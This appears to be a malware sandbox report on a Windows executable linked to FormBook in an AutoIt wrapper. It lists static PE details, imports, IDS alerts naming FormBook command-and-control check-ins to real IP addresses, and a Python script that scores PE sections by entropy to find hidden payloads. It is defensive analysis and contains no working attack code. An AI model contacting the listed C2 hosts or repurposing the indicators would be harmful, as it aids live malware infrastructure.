                                                                                  SHA512:cf966787c31425719d44e11b9d14c62174ed3b47f2022115038280cae23eb3d0e0b5403021cecfc474aff7a22172acd5852ae21f08487a6bd4e95e6c57dd695d
                                                                                  SSDEEP:24576:ktb20pkaCqT5TBWgNQ7aZVYUI1o9J0+lKipmS6A:NVg5tQ7aZVE1o4CKW5
                                                                                  TLSH:3D45D01363DEC365C3B25273BA657701BEBB782506A1F96B2FD4093DF820122525EA73
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........
                                                                                  Icon Hash:aaf3e3e3938382a0
                                                                                  Entrypoint:0x425f74
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x673D4752 [Wed Nov 20 02:20:02 2024 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:5
                                                                                  OS Version Minor:1
                                                                                  File Version Major:5
                                                                                  File Version Minor:1
                                                                                  Subsystem Version Major:5
                                                                                  Subsystem Version Minor:1
                                                                                  Import Hash:3d95adbf13bbe79dc24dccb401c12091
                                                                                  Instruction
                                                                                  call 00007FBD294E339Fh
                                                                                  jmp 00007FBD294D63B4h
                                                                                  int3
                                                                                  int3
                                                                                  push edi
                                                                                  push esi
                                                                                  mov esi, dword ptr [esp+10h]
                                                                                  mov ecx, dword ptr [esp+14h]
                                                                                  mov edi, dword ptr [esp+0Ch]
                                                                                  mov eax, ecx
                                                                                  mov edx, ecx
                                                                                  add eax, esi
                                                                                  cmp edi, esi
                                                                                  jbe 00007FBD294D653Ah
                                                                                  cmp edi, eax
                                                                                  jc 00007FBD294D689Eh
                                                                                  bt dword ptr [004C0158h], 01h
                                                                                  jnc 00007FBD294D6539h
                                                                                  rep movsb
                                                                                  jmp 00007FBD294D684Ch
                                                                                  cmp ecx, 00000080h
                                                                                  jc 00007FBD294D6704h
                                                                                  mov eax, edi
                                                                                  xor eax, esi
                                                                                  test eax, 0000000Fh
                                                                                  jne 00007FBD294D6540h
                                                                                  bt dword ptr [004BA370h], 01h
                                                                                  jc 00007FBD294D6A10h
                                                                                  bt dword ptr [004C0158h], 00000000h
                                                                                  jnc 00007FBD294D66DDh
                                                                                  test edi, 00000003h
                                                                                  jne 00007FBD294D66EEh
                                                                                  test esi, 00000003h
                                                                                  jne 00007FBD294D66CDh
                                                                                  bt edi, 02h
                                                                                  jnc 00007FBD294D653Fh
                                                                                  mov eax, dword ptr [esi]
                                                                                  sub ecx, 04h
                                                                                  lea esi, dword ptr [esi+04h]
                                                                                  mov dword ptr [edi], eax
                                                                                  lea edi, dword ptr [edi+04h]
                                                                                  bt edi, 03h
                                                                                  jnc 00007FBD294D6543h
                                                                                  movq xmm1, qword ptr [esi]
                                                                                  sub ecx, 08h
                                                                                  lea esi, dword ptr [esi+08h]
                                                                                  movq qword ptr [edi], xmm1
                                                                                  lea edi, dword ptr [edi+08h]
                                                                                  test esi, 00000007h
                                                                                  je 00007FBD294D6595h
                                                                                  bt esi, 03h
                                                                                  jnc 00007FBD294D65E8h
                                                                                  movdqa xmm1, dqword ptr [esi+00h]
                                                                                  Programming Language:
                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                  • [ASM] VS2012 UPD4 build 61030
                                                                                  • [RES] VS2012 UPD4 build 61030
                                                                                  • [LNK] VS2012 UPD4 build 61030
Name                                 | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IMPORT         | 0xb7004         | 0x17c        | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0xc4000         | 0x60358      | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_SECURITY       | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0x125000        | 0x6c4c       | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x8d8d0         | 0x1c         | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_TLS            | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0xb2730         | 0x40         | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IAT            | 0x8d000         | 0x860        | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          |
Name   | Virtual Address | Virtual Size | Raw Size | MD5                              | Xored PE | ZLIB Complexity     | File Type | Entropy            | Characteristics
.text  | 0x1000          | 0x8b54f      | 0x8b600  | f437a6545e938612764dbb0a314376fc | False    | 0.5699499019058296  | data      | 6.680413749210956  | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8d000         | 0x2cc42      | 0x2ce00  | 827ffd24759e8e420890ecf164be989e | False    | 0.330464397632312   | data      | 5.770192333189168  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data  | 0xba000         | 0x9d54       | 0x6200   | e0a519f8e3a35fae0d9c2cfd5a4bacfc | False    | 0.16402264030612246 | data      | 2.002691099965349  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc  | 0xc4000         | 0x60358      | 0x60400  | c936909db4f992a147b477f614da3d13 | False    | 0.931929788961039   | data      | 7.903039445408422  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x125000        | 0xa474       | 0xa600   | 0bc98f8631ef0bde830a7f83bb06ff08 | False    | 0.5017884036144579  | data      | 5.245426654116355  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name          | RVA      | Size    | Type                                                                                | Language | Country       | ZLIB Complexity
RT_ICON       | 0xc45a8  | 0x128   | Device independent bitmap graphic, 16 x 32 x 4, image size 192                      | English  | Great Britain | 0.7466216216216216
RT_ICON       | 0xc46d0  | 0x128   | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English  | Great Britain | 0.3277027027027027
RT_ICON       | 0xc47f8  | 0x128   | Device independent bitmap graphic, 16 x 32 x 4, image size 192                      | English  | Great Britain | 0.3885135135135135
RT_ICON       | 0xc4920  | 0x2e8   | Device independent bitmap graphic, 32 x 64 x 4, image size 0                        | English  | Great Britain | 0.3333333333333333
RT_ICON       | 0xc4c08  | 0x128   | Device independent bitmap graphic, 16 x 32 x 4, image size 0                        | English  | Great Britain | 0.5
RT_ICON       | 0xc4d30  | 0xea8   | Device independent bitmap graphic, 48 x 96 x 8, image size 0                        | English  | Great Britain | 0.2835820895522388
RT_ICON       | 0xc5bd8  | 0x8a8   | Device independent bitmap graphic, 32 x 64 x 8, image size 0                        | English  | Great Britain | 0.37906137184115524
RT_ICON       | 0xc6480  | 0x568   | Device independent bitmap graphic, 16 x 32 x 8, image size 0                        | English  | Great Britain | 0.23699421965317918
RT_ICON       | 0xc69e8  | 0x25a8  | Device independent bitmap graphic, 48 x 96 x 32, image size 0                       | English  | Great Britain | 0.13858921161825727
RT_ICON       | 0xc8f90  | 0x10a8  | Device independent bitmap graphic, 32 x 64 x 32, image size 0                       | English  | Great Britain | 0.25070356472795496
RT_ICON       | 0xca038  | 0x468   | Device independent bitmap graphic, 16 x 32 x 32, image size 0                       | English  | Great Britain | 0.3173758865248227
RT_MENU       | 0xca4a0  | 0x50    | data                                                                                | English  | Great Britain | 0.9
RT_STRING     | 0xca4f0  | 0x594   | data                                                                                | English  | Great Britain | 0.3333333333333333
RT_STRING     | 0xcaa84  | 0x68a   | data                                                                                | English  | Great Britain | 0.2747909199522103
RT_STRING     | 0xcb110  | 0x490   | data                                                                                | English  | Great Britain | 0.3715753424657534
RT_STRING     | 0xcb5a0  | 0x5fc   | data                                                                                | English  | Great Britain | 0.3087467362924282
RT_STRING     | 0xcbb9c  | 0x65c   | data                                                                                | English  | Great Britain | 0.34336609336609336
RT_STRING     | 0xcc1f8  | 0x466   | data                                                                                | English  | Great Britain | 0.3605683836589698
RT_STRING     | 0xcc660  | 0x158   | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0                    | English  | Great Britain | 0.502906976744186
RT_RCDATA     | 0xcc7b8  | 0x5765f | data                                                                                |          |               | 1.0003240377336353
RT_GROUP_ICON | 0x123e18 | 0x76    | data                                                                                | English  | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x123e90 | 0x14    | data                                                                                | English  | Great Britain | 1.25
RT_GROUP_ICON | 0x123ea4 | 0x14    | data                                                                                | English  | Great Britain | 1.15
RT_GROUP_ICON | 0x123eb8 | 0x14    | data                                                                                | English  | Great Britain | 1.25
RT_VERSION    | 0x123ecc | 0xdc    | data                                                                                | English  | Great Britain | 0.6181818181818182
RT_MANIFEST   | 0x123fa8 | 0x3b0   | ASCII text, with CRLF line terminators                                              | English  | Great Britain | 0.5116525423728814
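The two tables above are where the static verdict comes from: every section reports Xored PE = False, but .rsrc has entropy 7.90 and ZLIB complexity 0.93, and almost all of it is the single RT_RCDATA resource of 0x5765f bytes with complexity 1.00, i.e. incompressible. That is the shape of a compiled AutoIt binary, which carries its script as an RCDATA resource, and of a payload that is encrypted rather than merely compressed. The code below is an added example, not Joe Sandbox's implementation of those columns; it is my reading of how they are computed (8-bit Shannon entropy, zlib-compressed size over raw size, and a single-byte-XOR search for the DOS stub string). It walks a PE section table with nothing but struct, scores each section, and flags the ones that look like a carried payload. The PE image it runs on is constructed in the block (a low-entropy .text, a .data holding a XOR-0x5A DOS stub, and a pseudo-random .rsrc); it is not the sample.

```python
import math
import random
import struct
import zlib

DOS_STUB_MSG = b"This program cannot be run in DOS mode"


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte, 0.0 to 8.0 (the table's Entropy column)."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def zlib_complexity(data: bytes) -> float:
    """Compressed/raw size ratio; close to 1.0 means the bytes are already compressed or encrypted."""
    return len(zlib.compress(data, 9)) / len(data) if data else 0.0


def find_xored_pe(data: bytes):
    """Key byte if the DOS-stub message appears under a single-byte XOR (key 0 = plain), else None."""
    for key in range(256):
        if bytes(b ^ key for b in DOS_STUB_MSG) in data:
            return key
    return None


def parse_sections(pe: bytes) -> list:
    """Walk DOS header -> e_lfanew -> COFF header -> section headers and score each section's raw bytes."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    num_sections = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size            # section headers follow the optional header
    sections = []
    for i in range(num_sections):
        off = table + 40 * i                    # IMAGE_SECTION_HEADER is 40 bytes
        name = pe[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, vaddr, raw_size, raw_ptr = struct.unpack_from("<IIII", pe, off + 8)
        characteristics = struct.unpack_from("<I", pe, off + 36)[0]
        raw = pe[raw_ptr:raw_ptr + raw_size]
        sections.append({"name": name, "vaddr": vaddr, "vsize": vsize, "raw_size": raw_size,
                         "characteristics": characteristics,
                         "entropy": shannon_entropy(raw), "zlib": zlib_complexity(raw),
                         "xored_pe_key": find_xored_pe(raw)})
    return sections


def suspicious_sections(sections, entropy_threshold: float = 7.0) -> list:
    """Names of sections that look like a carried payload: near-random bytes or a XOR-hidden PE."""
    return [s["name"] for s in sections
            if s["entropy"] >= entropy_threshold or s["xored_pe_key"] is not None]


def build_test_image() -> bytes:
    """Constructed toy PE32 (not the sample): low-entropy .text, a .data holding a XOR-0x5A DOS stub,
    and a .rsrc of seeded pseudo-random bytes standing in for an encrypted resource."""
    rng = random.Random(1234)
    text_raw = b"\x55\x8b\xec\x90\xc3\x00\x00\x00" * 64
    data_raw = bytes(b ^ 0x5A for b in DOS_STUB_MSG).ljust(256, b"\0")
    rsrc_raw = bytes(rng.getrandbits(8) for _ in range(4096))
    layout = [(b".text", 0x1000, text_raw, 0x60000020),
              (b".data", 0x2000, data_raw, 0xC0000040),
              (b".rsrc", 0x3000, rsrc_raw, 0x40000040)]
    e_lfanew, opt_size = 0x40, 0xE0
    hdr = bytearray(b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", e_lfanew))
    hdr += b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(layout), 0, 0, 0, opt_size, 0x0102)
    hdr += bytes(opt_size)                      # optional header contents do not matter for the walk
    raw_ptr, body = 0x200, bytearray()
    for name, vaddr, raw, chars in layout:
        hdr += name.ljust(8, b"\0") + struct.pack("<IIIIIIHHI", len(raw), vaddr, len(raw),
                                                   raw_ptr, 0, 0, 0, 0, chars)
        body += raw
        raw_ptr += len(raw)
    return bytes(hdr.ljust(0x200, b"\0") + body)


if __name__ == "__main__":
    secs = parse_sections(build_test_image())
    for s in secs:
        print(f"{s['name']:<6} entropy={s['entropy']:.2f} zlib={s['zlib']:.2f} xor_key={s['xored_pe_key']}")
    print("suspicious:", suspicious_sections(secs))
```

On a real file, read the bytes and call parse_sections directly; the 7.0 entropy threshold is a working default, and the XOR scan only catches single-byte keys, which is what the report's column is meant to expose. For the sample in this report the interesting follow-up is the RCDATA blob itself: the AutoIt script is what carries the FormBook injection, so the resource, not the PE stub, is what goes to the decompiler.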
                                                                                  DLLImport
                                                                                  WSOCK32.dll__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                                                                                  VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                                  WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                  COMCTL32.dllImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                                                                                  MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                                  WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                                                                                  PSAPI.DLLGetProcessMemoryInfo
                                                                                  IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                                  USERENV.dllUnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                                                                                  UxTheme.dllIsThemeActive
                                                                                  KERNEL32.dllHeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, 
SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
USER32.dll: SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW,
GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
GDI32.dll: SetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
COMDLG32.dll: GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll: GetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
SHELL32.dll: DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll: CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll: RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit
Language of compilation system | Country where language is spoken | Map
English | Great Britain | (map image not captured)
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-20T08:31:49.721951+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49872 | 188.114.96.3 | 80 | TCP
2024-11-20T08:32:05.410049+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49966 | 76.223.74.74 | 80 | TCP
2024-11-20T08:32:05.410049+0100 | 2856318 | ETPRO MALWARE FormBook CnC Checkin (POST) M4 | 1 | 192.168.2.6 | 49966 | 76.223.74.74 | 80 | TCP
2024-11-20T08:32:07.970724+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49986 | 76.223.74.74 | 80 | TCP
2024-11-20T08:32:10.547590+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49987 | 76.223.74.74 | 80 | TCP
2024-11-20T08:32:13.073358+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49989 | 76.223.74.74 | 80 | TCP
2024-11-20T08:32:19.344001+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49990 | 163.44.185.183 | 80 | TCP
2024-11-20T08:32:21.920061+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49991 | 163.44.185.183 | 80 | TCP
2024-11-20T08:32:24.442541+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49992 | 163.44.185.183 | 80 | TCP
2024-11-20T08:32:26.991329+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49994 | 163.44.185.183 | 80 | TCP
2024-11-20T08:32:32.755875+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49995 | 172.67.162.12 | 80 | TCP
2024-11-20T08:32:35.294691+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49996 | 172.67.162.12 | 80 | TCP
2024-11-20T08:32:37.887957+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49997 | 172.67.162.12 | 80 | TCP
2024-11-20T08:32:40.445647+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49998 | 172.67.162.12 | 80 | TCP
2024-11-20T08:32:47.094329+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49999 | 85.159.66.93 | 80 | TCP
2024-11-20T08:32:49.639800+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50000 | 85.159.66.93 | 80 | TCP
2024-11-20T08:32:52.186643+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50002 | 85.159.66.93 | 80 | TCP
2024-11-20T08:32:53.922706+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 50003 | 85.159.66.93 | 80 | TCP
2024-11-20T08:32:59.965616+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50004 | 103.21.221.4 | 80 | TCP
2024-11-20T08:33:02.486694+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50005 | 103.21.221.4 | 80 | TCP
2024-11-20T08:33:05.036604+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50006 | 103.21.221.4 | 80 | TCP
2024-11-20T08:33:07.603228+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 50007 | 103.21.221.4 | 80 | TCP
2024-11-20T08:33:13.289060+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50008 | 188.114.96.3 | 80 | TCP
2024-11-20T08:33:15.886844+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50009 | 188.114.96.3 | 80 | TCP
2024-11-20T08:33:18.423233+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50010 | 188.114.96.3 | 80 | TCP
2024-11-20T08:33:20.999361+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 50011 | 188.114.96.3 | 80 | TCP
2024-11-20T08:33:26.642780+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50014 | 66.29.137.10 | 80 | TCP
2024-11-20T08:33:29.217437+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50015 | 66.29.137.10 | 80 | TCP
